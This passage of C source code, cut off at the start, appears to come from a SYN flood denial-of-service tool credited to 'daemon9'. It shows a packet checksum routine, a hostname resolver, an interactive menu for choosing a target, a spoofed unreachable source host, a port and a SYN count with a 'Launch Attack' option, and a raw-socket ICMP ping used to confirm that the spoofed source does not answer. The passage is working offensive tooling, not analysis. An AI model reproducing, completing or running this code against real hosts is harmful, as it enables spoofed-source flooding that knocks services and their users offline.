while (nbytes > 1) { sum += *ptr++; nbytes -= 2; } /* mop up an odd byte, if necessary */ if (nbytes == 1) { oddbyte = 0; /* make sure top half is zero */ *((u_char *) &oddbyte) = *(u_char *)ptr; /* one byte only */ sum += oddbyte; } /* * Add back carry outs from top 16 bits to low 16 bits. */ sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* ones-complement, then truncate to 16 bits */ return(answer); } /* * Converts IP addresses */ unsigned nameResolve(char *hostname){ struct in_addr addr; struct hostent *hostEnt; if((addr.s_addr=inet_addr(hostname))==-1){ if(!(hostEnt=gethostbyname(hostname))){ fprintf(stderr,"Name lookup failure: `%s`\n",hostname); exit(0); } bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length); } return addr.s_addr; } /* * Menu function. Nothing suprising here. Except that one thing. */ void menu(sock1,nameID) int sock1; char *nameID; { int slickPing(int,int,char *); void flood(int,unsigned,unsigned,u_short,int); unsigned nameResolve(char *); void demon(int,char *,char *,int,int,int,int); int i,sock2,menuLoop=1,icmpAmt,port,amount,interval,ttl; char optflags[7]={0}; /* So we can keep track of the options */ static char tmp[MENUBUF+1]={0},target[MENUBUF+1]={0},unreach[MENUBUF+1]={0}; while(menuLoop){ printf("\n\n\t\t\t[ SYNflood Menu ]\n\t\t\t [ daemon9 ]\n\n"); if(!optflags[0])printf("1\t\tEnter target host\n"); else printf("[1]\t\tTarget:\t\t\t%s\n",target); if(!optflags[1])printf("2\t\tEnter source (unreachable) host\n"); else printf("[2]\t\tUnreachable:\t\t%s\n",unreach); if(!optflags[2])printf("3\t\tSend ICMP_ECHO(s) to unreachable\n"); else printf("[3]\t\tUnreachable host:\tverified unreachable\n"); if(!optflags[3])printf("4\t\tEnter port number to flood\n"); else if(port)printf("[4]\t\tFlooding:\t\t%d\n",port); else printf("[4]\t\tFlooding:\t\t1-1024\n"); if(!optflags[4])printf("5\t\tEnter number of SYNs\n"); else printf("[5]\t\tNumber SYNs:\t\t%d\n",amount); printf("\n6\t\tQuit\n"); if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("7\t\tLaunch Attack\n"); if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4])printf("8\t\tDaemonize\n"); printf("\n\n\n\n\n\n\n\n\n\n\n\n"); fgets(tmp,BUFLEN/2,stdin); /* tempered input */ switch(atoi(tmp)){ case 1: printf("[hostname]-> "); fgets(target,MENUBUF,stdin); i=0; if(target[0]=='\n')break; while(target[i]!='\n')i++; target[i]=0; optflags[0]=1; break; case 2: printf("[hostname]-> "); fgets(unreach,MENUBUF,stdin); i=0; if(unreach[0]=='\n')break; while(unreach[i]!='\n')i++; unreach[i]=0; optflags[1]=1; break; case 3: if(!optflags[1]){ fprintf(stderr,"Um, enter a host first\n"); usleep(MENUSLEEP); break; } /* Raw ICMP socket */ if((sock2=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){ perror("\nHmmm.... socket problems\n"); exit(1); } printf("[number of ICMP_ECHO's]-> "); fgets(tmp,MENUBUF,stdin); if(!(icmpAmt=atoi(tmp)))break; if(slickPing(icmpAmt,sock2,unreach)){ fprintf(stderr,"Host is reachable... Pick a new one\n"); sleep(1); optflags[1]=0; optflags[2]=0; HANDLERCODE=1; close(sock2); break; } optflags[2]=1; close(sock2); break; case 4: printf("[port number]-> "); fgets(tmp,MENUBUF,stdin); port=atoi(tmp); optflags[3]=1; break; case 5: printf("[number of SYNs]-> "); fgets(tmp,MENUBUF,stdin); if(!(amount=atoi(tmp)))break; optflags[4]=1; break; case 6: menuLoop--; break; case 7: if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]){ syslog(LOG_LOCAL6|LOG_INFO,"FLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d\n",getpid(),nameID,target,unreach,port,amount); flood(sock1,nameResolve(unreach),nameResolve(target),port,amount); menuLoop--; } else{ fprintf(stderr,"Illegal option --try again\n"); usleep(MENUSLEEP); } break; case 8: if(optflags[0]&&optflags[1]&&optflags[3]&&optflags[4]){ if(!port){ fprintf(stderr,"Cannot set infinity flag in daemon mode. Sorry.\n"); usleep(MENUSLEEP*2); break; } printf("[packet sending interval in seconds {80}]-> "); fgets(tmp,MENUBUF,stdin); if(!(interval=atoi(tmp)))interval=80; printf("[time for daemon to live in whole hours(0=forever)]-> "); fgets(tmp,MENUBUF,stdin); ttl=atoi(tmp); syslog(LOG_LOCAL6|LOG_INFO,"DFLOOD: PID: %d, User:%s Target:%s Unreach:%s Port:%d Number:%d Interval: %d TTL: %d\n",getpid(),nameID,target,unreach,port,amount,interval,ttl); demon(sock1,unreach,target,port,amount,interval,ttl); exit(0); } else{ fprintf(stderr,"Illegal option --try again\n"); usleep(MENUSLEEP); } break; default: fprintf(stderr,"Illegal option --try again\n"); usleep(MENUSLEEP); } } printf("\n"); printf(werd); return; } /* * SlickPing. A quick and dirty ping hack. Sends <amount> ICMP_ECHO * packets and waits for a reply on any one of them... It has to check * to make sure the ICMP_ECHOREPLY is actually meant for us, as raw ICMP * sockets get ALL the ICMP traffic on a host, and someone could be * pinging some other host and we could get that ECHOREPLY and foul * things up for us. */ int slickPing(amount,sock,dest) int amount,sock; char *dest; { int alarmHandler(); unsigned nameResolve(char *); register int retcode,j=0; struct icmphdr *icmp; struct sockaddr_in sin; unsigned char sendICMPpak[MAXPAK]={0}; unsigned short pakID=getpid()&0xffff; struct ippkt{ struct iphdr ip; struct icmphdr icmp; char buffer[MAXPAK]; }pkt; bzero((char *)&sin,sizeof(sin)); sin.sin_family=AF_INET; sin.sin_addr.s_addr=nameResolve(dest); /* ICMP Packet assembly */ /* We let the kernel create our IP header as it is legit */ icmp=(struct icmphdr *)sendICMPpak; icmp->type=ICMP_ECHO; /* Requesting an Echo */ icmp->code=0; /* 0 for ICMP ECHO/ECHO_REPLY */ icmp->un.echo.id=pakID; /* To identify upon return */ icmp->un.echo.sequence=0; /* Not used for us */ icmp->checksum=in_cksum((unsigned short *)icmp,64); fprintf(stderr,"sending ICMP_ECHO packets: "); for(;j<amount;j++){ usleep(ICMPSLEEP); /* For good measure */ retcode=sendto(sock,sendICMPpak,64,0,(struct sockaddr *)&sin,sizeof(sin)); if(retcode<0||retcode!=64) if(retcode<0){ perror("ICMP sendto err"); exit(1); } else fprintf(stderr,"Only wrote %d bytes",retcode); else fprintf(stderr,"."); } HANDLERCODE=1; signal(SIGALRM,alarmHandler); /* catch the ALARM and handle it */ fprintf(stderr,"\nSetting alarm timeout for 10 seconds...\n"); alarm(10); /* ALARM is set b/c read() will block forever if no */ while(1){ /* packets arrive... (which is what we want....) */ read(sock,(struct ippkt *)&pkt,MAXPAK-1); if(pkt.icmp.type==ICMP_ECHOREPLY&&icmp->un.echo.id==pakID){ if(!HANDLERCODE)return(0); return(1); } } } /* * SIGALRM signal handler. Souper simple. */ int alarmHandler(){ HANDLERCODE=0; /* shame on me for using global vars */ alarm(0); signal(SIGALRM,SIG_DFL); return(0); } /* * Usage function... */ void usage(nomenclature) char *nomenclature; { fprintf(stderr,"\n\nUSAGE: %s \n\t-s unreachable_host \n\t-t target_host \n\t-p port [-8 (infinity switch)] \n\t-a amount_of_SYNs\n",nomenclature); exit(0); } /* * Demon. Backgrounding procedure and looping stuff. */ void demon(sock,unreachable,target,port,amount,interval,ttl) int sock; char *unreachable; char *target; int port; int amount; int interval; int ttl; { fprintf(stderr,"\nSorry Daemon mode not available in this version\n"); exit(0); }